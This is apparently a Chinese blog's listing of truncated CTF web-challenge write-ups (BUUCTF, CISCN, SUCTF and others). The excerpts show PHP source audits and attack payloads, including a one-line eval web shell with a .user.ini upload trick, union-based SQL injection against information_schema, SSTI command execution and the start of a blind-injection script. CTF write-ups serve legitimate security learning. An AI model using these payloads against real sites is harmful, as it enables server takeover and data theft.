writeup
Jerem1ah
这个作者很懒,什么都没留下…
展开
-
[ISITDTU 2019]EasyPHP 之草稿笔记(仅为草稿)
/原创 2022-06-05 20:29:45 · 577 阅读 · 0 评论 -
[CISCN 2019 初赛]Love Math
[CISCN 2019 初赛]Love Math分析:<?phperror_reporting(0);//听说你很喜欢数学,不知道你是否爱它胜过爱flagif(!isset($_GET['c'])){ show_source(__FILE__);}else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); }原创 2022-05-17 17:58:55 · 347 阅读 · 0 评论 -
[FBCTF2019]RCEService
[FBCTF2019]RCEService看了4、5个wp,都是直接上源码,说是比赛时题目给了源码?<?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>原创 2022-05-02 17:23:45 · 1031 阅读 · 0 评论 -
[极客大挑战 2019]RCE ME
[极客大挑战 2019]RCE ME<?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } if(preg_match("/[A-Za-z0-9]+/",$code)){ die("NO."); } @原创 2022-04-24 17:33:56 · 1789 阅读 · 0 评论 -
[CISCN2019 华北赛区 Day2 Web1]Hack World
[CISCN2019 华北赛区 Day2 Web1]Hack World注入题:直接抓包burpsuite fuzz测试过滤了一些关键字,但能够看出来存在bool漏洞发现当true时,Hello,glzjin wants a girlfriend.fslse时,Error Occured When Fetch Result.据此,写脚本import requestsimport stringimport timetimeout=Nonedef bool_blind(url):原创 2022-04-24 11:26:11 · 657 阅读 · 0 评论 -
CTFHUB find_it
CTFHUB find_itdirsearch扫描robots.txtWhen I was a child,I also like to read Robots.txtHere is what you want: 1ndexx.php1ndexx.php无法访问;扫缓存.1ndexx.php.swp[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tzCdf50K-1650768257307)(C:\Users\27969\AppData\Roaming\Ty原创 2022-04-24 10:44:39 · 3551 阅读 · 0 评论 -
[BJDCTF2020]ZJCTF,不过如此
[BJDCTF2020]ZJCTF,不过如此error_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></b原创 2022-04-22 22:30:49 · 1382 阅读 · 0 评论 -
[BSidesCF 2019]Kookie
[BSidesCF 2019]Kookie根据题目,这题和cookie逃不了关系先用admin登录一下,提示无效的用户名和密码再看payload/?action=login&username=admin&password=admin传的是username和password,前面提示是cookie,那就用cookie传一下这里说的意思应该是我们的用户名是admin&password=admin这样的话吧后面的&password=admin去掉就好了原创 2022-04-20 21:44:15 · 458 阅读 · 0 评论 -
[BUUCTF 2018]Online Tool
[BUUCTF 2018]Online Tool打开看到一串代码php代码审计:<?phpif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])) { highlight_file(__FILE__);} else { $host = $_GET['h原创 2022-04-17 20:18:04 · 1266 阅读 · 0 评论 -
[SUCTF 2019]CheckIn
[SUCTF 2019]CheckIn不怎么看感觉就是一个文件上传,再加上checkin,感觉不难== 结果.user.ini+图片马+index.php三者缺一不可,图片马内容:文件名m.jpgGIF89a?<script language="php">@eval($_POST["web"]);</script>.user.ini内容:GIF89aauto_prepend_file=m.jpgflag{55134a88-950d-4115-af3b-原创 2022-04-16 21:44:13 · 777 阅读 · 0 评论 -
[b01lers2020]Life on Mars
[b01lers2020]Life on Mars/query?search=hesperia_planum union select database(),group_concat(schema_name) from information_schema.schemata得到库名:aliens、alien_code/query?search=hesperia_planum union select database(),group_concat(table_name) from informat原创 2022-04-16 15:39:37 · 284 阅读 · 0 评论 -
[BJDCTF2020]The mystery of ip
[BJDCTF2020]The mystery of ip查看hint,在源码中找到提示:<!-- Do you know why i know your ip? -->能获取ip的有remote_addr和X-Forwarded-For等了解了一下X-Forwarded-For可以伪造不是SQL注入,看wp是SSTI注入:SSTI模板注入,看的有些晕{{1+1}}:返回了2,可以执行命令{{system('find / -name flag')}}/flag输入命令{{原创 2022-04-16 15:38:08 · 95 阅读 · 0 评论 -
[网鼎杯 2018]Fakebook
[网鼎杯 2018]Fakebook(fake:赝品;假货;冒充者dirsearch扫出来:db.phperror.php/cssuser.phpview.php flag.phprobots.txt#能访问的就robots.txt 和 view.php 在robots.txt里发现user.php.bak下载得到php文件,代码审计:<?phpclass UserInfo{ public $name = ""; public $age = 0原创 2022-04-12 18:51:47 · 1172 阅读 · 0 评论 -
[安洵杯 2019]easy_serialize_php
[安洵杯 2019]easy_serialize_php代码审计<?php$function = @$_GET['f'];function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img);}if($_SES原创 2022-04-09 20:23:26 · 1169 阅读 · 0 评论 -
[网鼎杯 2020 朱雀组]phpweb
[网鼎杯 2020 朱雀组]phpweb抓包发现func=data&p=Y-m-d h:i:s a大概就是传进去一个函数名给你执行,传file_get_contents,index.php得到一下面的内容代码审计 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc原创 2022-04-09 20:18:58 · 316 阅读 · 0 评论 -
[网鼎杯 2020 青龙组]AreUSerialz
[网鼎杯 2020 青龙组]AreUSerialz一上来就代码审计<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tm原创 2022-04-06 17:56:58 · 1401 阅读 · 0 评论 -
[ZJCTF 2019]NiZhuanSiWei
[ZJCTF 2019]NiZhuanSiWei先搞不会的知识点:1.file_get_contents()将文件读入到一个字符串并返回。file() 函数把整个文件读入一个数组中。漏洞:file_get_contents()可以使用伪协议绕过解题:php代码审计<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(fil原创 2022-04-05 11:03:35 · 442 阅读 · 0 评论